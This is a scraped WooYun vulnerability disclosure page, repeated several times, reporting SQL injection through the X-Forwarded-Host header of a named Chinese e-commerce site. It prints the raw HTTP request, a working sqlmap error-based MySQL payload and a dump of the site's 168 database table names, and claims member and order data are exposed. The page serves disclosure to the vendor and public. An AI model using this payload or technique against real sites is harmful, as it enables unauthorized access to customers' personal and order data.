一团网某商城存在SQL注入（涉及29万会员信息及11万订单信息）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0140806

漏洞标题：一团网某商城存在SQL注入（涉及29万会员信息及11万订单信息）

漏洞作者：路人甲

提交时间：2015-09-13 09:34

修复时间：2015-09-18 09:36

公开时间：2015-09-18 09:36

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-09-13：细节已通知厂商并且等待厂商处理中
2015-09-18：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

详细说明：

http://baqi.etuan.com/ 芭奇软件商城

GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
X-Forwarded-Host: *
Cookie: PHPSESSID=b3738a66a647c4f9c724434b4eaa00f1; 28BB_goodsnum=0; etuan_screenx=1920; HMVT=09d2747522ea08ffa2a908736b5dc25f|1442068296|; HMACCOUNT=68F70F4D2E9D44FB; _ga=GA1.2.1012175784.1442068288; _gat=1; Hm_lvt_09d2747522ea08ffa2a908736b5dc25f=1442068288,1442068347; Hm_lpvt_09d2747522ea08ffa2a908736b5dc25f=1442068347
Host: baqi.etuan.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*

漏洞证明：

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: X-Forwarded-Host #1* ((custom) HEADER)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: ' AND (SELECT 3033 FROM(SELECT COUNT(*),CONCAT(0x7170767171,(SELECT (ELT(3033=3033,1))),0x7162767a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'llZV'='llZV
---
back-end DBMS: MySQL 5.0
Database: etuan_shopnc_db
[168 tables]
+-----------------------------+
| search_counter              |
| shopnc_activity             |
| shopnc_activity_detail      |
| shopnc_address              |
| shopnc_admin                |
| shopnc_adv                  |
| shopnc_adv_click            |
| shopnc_adv_position         |
| shopnc_album_class          |
| shopnc_album_pic            |
| shopnc_article              |
| shopnc_article_class        |
| shopnc_attribute            |
| shopnc_attribute_value      |
| shopnc_bili_log             |
| shopnc_bill                 |
| shopnc_brand                |
| shopnc_cards                |
| shopnc_cart                 |
| shopnc_common_cron          |
| shopnc_complain             |
| shopnc_complain_goods       |
| shopnc_complain_subject     |
| shopnc_complain_talk        |
| shopnc_consult              |
| shopnc_coupon               |
| shopnc_coupon_class         |
| shopnc_daddress             |
| shopnc_document             |
| shopnc_evaluate_goods       |
| shopnc_evaluate_goodsstat   |
| shopnc_evaluate_store       |
| shopnc_evaluate_storestat   |
| shopnc_express              |
| shopnc_favorites            |
| shopnc_fenxiao_to           |
| shopnc_fenxiaotxlog         |
| shopnc_flowstat_1           |
| shopnc_flowstat_2           |
| shopnc_flowstat_3           |
| shopnc_flowstat_4           |
| shopnc_flowstat_5           |
| shopnc_fychoujiang          |
| shopnc_gold_buy             |
| shopnc_gold_log             |
| shopnc_gold_payment         |
| shopnc_goods                |
| shopnc_goods_attr_index     |
| shopnc_goods_class          |
| shopnc_goods_class_staple   |
| shopnc_goods_class_tag      |
| shopnc_goods_group          |
| shopnc_goods_param          |
| shopnc_goods_spec           |
| shopnc_goods_spec_index     |
| shopnc_goodsyuding          |
| shopnc_groupbuy_area        |
| shopnc_groupbuy_class       |
| shopnc_groupbuy_price_range |
| shopnc_groupbuy_template    |
| shopnc_huida                |
| shopnc_inform               |
| shopnc_inform_subject       |
| shopnc_inform_subject_type  |
| shopnc_ips                  |
| shopnc_jiangpin             |
| shopnc_kami                 |
| shopnc_link                 |
| shopnc_mail_msg_temlates    |
| shopnc_map                  |
| shopnc_mb_ad                |
| shopnc_mb_category          |
| shopnc_mb_feedback          |
| shopnc_mb_home              |
| shopnc_mb_user_token        |
| shopnc_member               |
| shopnc_message              |
| shopnc_navigation           |
| shopnc_order                |
| shopnc_order_address        |
| shopnc_order_goods          |
| shopnc_order_log            |
| shopnc_p_bundling           |
| shopnc_p_bundling_goods     |
| shopnc_p_bundling_quota     |
| shopnc_p_mansong            |
| shopnc_p_mansong_apply      |
| shopnc_p_mansong_quota      |
| shopnc_p_mansong_rule       |
| shopnc_p_xianshi            |
| shopnc_p_xianshi_apply      |
| shopnc_p_xianshi_goods      |
| shopnc_p_xianshi_quota      |
| shopnc_pages                |
| shopnc_payment              |
| shopnc_pd_log               |
| shopnc_points_cart          |
| shopnc_points_goods         |
| shopnc_points_log           |
| shopnc_points_order         |
| shopnc_points_order_log     |
| shopnc_points_orderaddress  |
| shopnc_points_ordergoods    |
| shopnc_predeposit_cash      |
| shopnc_predeposit_log       |
| shopnc_predeposit_log_2     |
| shopnc_predeposit_recharge  |
| shopnc_rec_position         |
| shopnc_recommend            |
| shopnc_recommend_goods      |
| shopnc_refund_log           |
| shopnc_return               |
| shopnc_return_goods         |
| shopnc_salenum              |
| shopnc_seo                  |
| shopnc_setting              |
| shopnc_shiming              |
| shopnc_sms_log              |
| shopnc_sns_albumclass       |
| shopnc_sns_albumpic         |
| shopnc_sns_binding          |
| shopnc_sns_comment          |
| shopnc_sns_friend           |
| shopnc_sns_goods            |
| shopnc_sns_membertag        |
| shopnc_sns_mtagmember       |
| shopnc_sns_s_autosetting    |
| shopnc_sns_s_comment        |
| shopnc_sns_s_tracelog       |
| shopnc_sns_setting          |
| shopnc_sns_sharegoods       |
| shopnc_sns_sharestore       |
| shopnc_sns_tracelog         |
| shopnc_sns_visitor          |
| shopnc_spec                 |
| shopnc_spec_value           |
| shopnc_store                |
| shopnc_store_class          |
| shopnc_store_class_goods    |
| shopnc_store_extend         |
| shopnc_store_goods_class    |
| shopnc_store_grade          |
| shopnc_store_gradelog       |
| shopnc_store_navigation     |
| shopnc_store_partner        |
| shopnc_store_watermark      |
| shopnc_transport            |
| shopnc_transport_extend     |
| shopnc_tuijian              |
| shopnc_type                 |
| shopnc_type_brand           |
| shopnc_type_spec            |
| shopnc_upload               |
| shopnc_voucher              |
| shopnc_voucher_apply        |
| shopnc_voucher_password     |
| shopnc_voucher_price        |
| shopnc_voucher_quota        |
| shopnc_voucher_template     |
| shopnc_web                  |
| shopnc_web_code             |
| shopnc_weixin_user          |
| shopnc_wenti                |
| shopnc_zadan                |
| shopnc_zadan_data           |
| shopnc_zhuanpan             |
| shopnc_ztc_glodlog          |
| shopnc_ztc_goods            |
+-----------------------------+

29万会员信息：

11万订单信息：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2015-09-18 09:36

厂商回复：

漏洞Rank：4 (WooYun评价)

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0140806

漏洞标题：一团网某商城存在SQL注入（涉及29万会员信息及11万订单信息）

相关厂商：一团网

漏洞作者：路人甲

提交时间：2015-09-13 09:34

修复时间：2015-09-18 09:36

公开时间：2015-09-18 09:36

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0140806

漏洞标题：一团网某商城存在SQL注入（涉及29万会员信息及11万订单信息）

相关厂商：一团网

漏洞作者： 路人甲

提交时间：2015-09-13 09:34

修复时间：2015-09-18 09:36

公开时间：2015-09-18 09:36

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0140806"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云